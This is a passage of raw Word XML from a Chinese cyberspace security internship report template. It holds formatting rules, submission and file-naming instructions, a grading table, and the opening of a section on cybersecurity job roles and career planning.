        <w:t>倍行距；段落首行缩进2字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33869ACA">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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如有图、表，表序号及表名置于表左上方，图序号及图名置于图正下方。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22575AFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如有引用参考文献请参照《参考文献格式国家标准(GB-T-7714-2005)》。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F064AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提交文件清单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170A1F2">
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最终需要提交本实习报告(p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>df</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>格式和d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ocx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>格式)和汇报PPT文件，报告和ppt打包后提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC32DC">
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文档、ppt、压缩包文件统一命名为：班号_学号_姓名_网络空间安全认知实习.后缀。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E32B60">
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>格式以及文件命名方式不合格将酌情扣分。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C46294">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B43C1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>任课教师打分表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD850DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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3"/>
        <w:gridCol w:w="2260"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1486"/>
        <w:gridCol w:w="2192"/>
      </w:tblGrid>
      <w:tr w14:paraId="4EC0AF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3823" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75418497">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项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="227BF94C">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满分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="769466F8">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分数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="310D77E2">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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F5322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63" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="227ECC84">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平时成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="752C4A11">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考勤</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561F49D4">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（三次签到）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56B6D8F8">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70B0C748">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FB1B2B6">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1851CD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63" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="690CEF25">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="301C0703">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验收</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E106326">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（PPT及汇报）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="245030AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ECFBAFA">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69FF5657">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F8AC1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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66B2B7B2">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报告成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A33C617">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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>网络空间安全通识认知部分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07BBD966">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F9B7858">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BFFF14E">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="450CE9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1563" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53871F67">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CAEA1FB">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2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>网络空间安全实验部分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68CD69D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>30分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15EAA316">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56C9D218">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="388427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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2216AE99">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="383A7DC3">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3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>网络空间安全实践部分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C298F06">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10分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E9E8CA">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DF0B3CE">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D9F17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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AE0F846">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合计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5906770F">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100分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55209504">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2192" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53A2964D">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32B93DA1">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218A284">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报告1.网络空间安全通识认知</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E461F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="643" w:firstLineChars="200"/>
        <w:jc w:val="center"/>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网络安全人才服务岗位、职务调研及个人职业规划</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6819F3B8">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Theme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络空间安全竞争的核心是人才的竞争，随着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络在我国的快速发展和全国大范围的普及，我国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络安全服务岗位迅速增加。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41F531">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="643" w:firstLineChars="200"/>
        <w:jc w:val="left"/>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网络安全服务人才岗位需求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647341F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Theme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
